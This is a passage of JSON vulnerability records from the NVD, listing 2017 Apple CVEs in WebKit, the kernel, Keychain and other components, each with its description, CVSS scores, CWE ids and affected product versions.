"PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2481"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2481", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2481", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:52:04", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"JavaScriptCore\" component. It allows remote attackers to conduct Universal XSS (UXSS) attacks via a crafted web site that triggers prototype mishandling.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-2492", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2492"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-2492", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2492", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T15:49:10", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. The issue involves the \"Keychain\" component. It allows man-in-the-middle attackers to bypass an iCloud Keychain secret protection mechanism by leveraging lack of authentication for OTR packets.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2448", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2448"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2448", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2448", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:43", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Audio\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted audio file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2462", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2462"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2462", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2462", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:50:01", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2470", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2470"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2470", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2470", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:46:04", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves symlink mishandling in the \"libarchive\" component. It allows local users to change arbitrary directory permissions via unspecified vectors.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2390", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2390"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2390", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2390", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:29", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Kernel\" component. A race condition allows attackers to execute arbitrary code in a privileged context via a crafted app.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2456", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2456"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2456", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2456", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:50:06", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (use-after-free) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2472", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2472"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2472", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:51:15", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Kernel\" component. A race condition allows attackers to execute arbitrary code in a privileged context via a crafted app.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2478", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2478"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2478", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2478", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:45:57", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2386", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2386"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2386", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2386", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:59", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2469", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2469"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2469", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2469", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:48:55", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (integer overflow) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2440", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2440"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2440", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2440", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:36", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2459", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2459"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1", "cpe:/a:apple:safari:10.0.3"], "id": "CVE-2017-2459", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2459", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:06", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to conduct Universal XSS (UXSS) attacks via crafted frame objects.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2445", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2445"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2445", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2445", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:46:48", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"FontParser\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted font file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2407", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": 